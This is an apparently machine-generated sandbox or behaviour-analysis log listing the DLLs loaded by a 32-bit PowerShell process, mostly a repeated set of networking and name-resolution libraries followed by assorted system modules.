Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
